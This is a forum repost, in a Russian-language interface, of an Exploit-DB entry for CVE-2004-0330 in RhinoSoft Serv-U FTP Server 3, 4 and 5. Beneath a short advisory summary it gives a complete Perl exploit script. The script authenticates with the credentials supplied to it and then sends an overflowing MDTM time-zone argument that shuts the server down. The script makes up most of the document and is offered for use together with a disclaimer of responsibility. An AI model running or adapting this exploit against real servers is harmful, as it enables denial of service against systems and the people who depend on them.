Exploit RhinoSoft Serv-U FTPd Server 3/4/5 - 'MDTM' Time Argument Buffer Overflow (1)

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
23760
Проверка EDB
  1. Пройдено
Автор
SAINTJMF
Тип уязвимости
DOS
Платформа
WINDOWS
CVE
cve-2004-0330
Дата публикации
2004-02-26
Код:
source: https://www.securityfocus.com/bid/9751/info

Serv-U FTP Server has been reported prone to a remote stack based buffer overflow vulnerability when handling time zone arguments passed to the MDTM FTP command.

The problem exists due to insufficient bounds checking. Ultimately an attacker may leverage this issue to have arbitrary instructions executed in the context of the SYSTEM user. 

## Coded by saintjmf
## This exploits Serv-u MDTM buffer overflow - Shutsdown server
## Discovered by bkbll - Info provided by securityfocus
## For exploit to work you need valid username and password
## I do not take responsibility for the use of this code

use IO::Socket qw(:DEFAULT :crlf);
print "Serv-u MDTM Buffer overflow - by saintjmf\n";

## Get Host port unsername and password

my $host = shift || die print "\nUsage: <program> <Host> <port> <username> <password>\n";
my $port = shift || die print "\nUsage: <program> <Host> <port> <username> <password> \n";

$username = shift || die print "\nUsage: <program> <Host> <port> <username> <password> \n"; 
$password = shift || die print "\nUsage: <program> <Host> <port> <username> <password> \n";

## Create Socket
my $socket = IO::Socket::INET->new("$host:$port")  or die print "\nUnable to connect -- $!\n";

print "connecting...............\n\n";

connecter($socket);


print "Server should be stopped\n";


## Sub that sends username, password and exploit

sub connecter{	
	$/ = CRLF;
	my $socket2 = shift;
	my $message2 = <$socket2>;
	chomp $message2;
	print "$message2\n";
	sleep(5);
	print $socket2 "user $username",CRLF;
	$message2 = <$socket2>;
	chomp $message2;
	print "$message2\n";
sleep (5);
	print $socket2 "pass $password", CRLF;

	$message2 = <$socket2>;
	chomp $message2;
	print "$message2\n";
sleep (4);
	print "Sending MDTM Overflow.....\n";
	print $socket2 "MDTM 20041111111111+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA /test.txt" ,CRLF;

}
 
Источник
www.exploit-db.com

Похожие темы